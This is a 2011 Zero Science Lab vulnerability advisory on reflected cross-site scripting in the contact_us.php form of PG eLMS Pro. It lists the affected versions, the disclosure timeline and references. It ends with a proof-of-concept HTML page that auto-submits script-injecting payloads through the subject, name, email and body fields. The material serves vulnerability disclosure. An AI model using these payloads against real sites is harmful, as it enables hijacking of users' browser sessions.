Title: PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities
Advisory ID: ZSL-2011-5027
Type: Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 14.07.2011
eLMS Pro solution is an outstanding and yet simple Learning Management system. Our product is designed for any education formations: from small distance training companies up to big colleges and universities. The system allows to build courses, import SCORM content, deploy online learning, manage users, communicate with users, track training results, and more.
Input passed via the ‘subject’, ‘name’, ‘email’ and ‘body’ parameters to ‘contact_us.php’ script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
PilotGroup Ltd - http://www.elmspro.com
DEC_2007_01
Microsoft Windows XP Professional SP3 (EN)
Apache 1.3.27 (Win32)
PHP 5.2.4
MySQL 14.14 Distrib 5.1.43 (Win32-ia32)
[08.07.2011] Vulnerability discovered.
[08.07.2011] Initial contact with the vendor.
[13.07.2011] No response from vendor.
[14.07.2011] Public security advisory released.
elms_xss.html
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] http://packetstormsecurity.org/files/103052
[2] http://www.exploit-db.com/exploits/17531/
[3] http://www.securityfocus.com/bid/48681
[4] http://securityreason.com/exploitalert/10621
[5] http://xforce.iss.net/xforce/xfdb/68567
[6] http://secunia.com/advisories/40163/
[14.07.2011] - Initial release
[15.07.2011] - Added reference [3] and [4]
[19.07.2011] - Added reference [5] and [6]
Zero Science Lab
Web: http://www.zeroscience.mk
e-mail: [email protected]
<!--
PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities
Vendor: PilotGroup Ltd
Product web page: http://www.elmspro.com
Affected version: DEC_2007_01
Summary: eLMS Pro solution is an outstanding and yet simple Learning Management
system. Our product is designed for any education formations: from small distance
training companies up to big colleges and universities. The system allows to build
courses, import SCORM content, deploy online learning, manage users, communicate
with users, track training results, and more.
Desc: Input passed via the 'subject', 'name', 'email' and 'body' parameters to
'contact_us.php' script is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 1.3.27 (Win32)
PHP 5.2.4
MySQL 14.14 Distrib 5.1.43 (Win32-ia32)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab
Advisory ID: ZSL-2011-5027
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php
08.07.2011
--><html>
<head><title>PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities</title>
</head><body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://localhost:6450/contact_us.php" enctype="application/x-www-form-urlencoded" id="xss" method="POST">
<input name="send" type="hidden" value="1"/>
<input name="subject" type="hidden" value='"><script>alert(1)</script>'/>
<input name="name" type="hidden" value='"><script>alert(2)</script>'/>
<input name="email" type="hidden" value='"><script>alert(3)</script>'/>
<input name="body" type="hidden" value='1</textarea>"><script>alert(4)</script>'/>
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3><br/><br/>Exploit!<h3></h3></h3></center></a>
</body>
</html>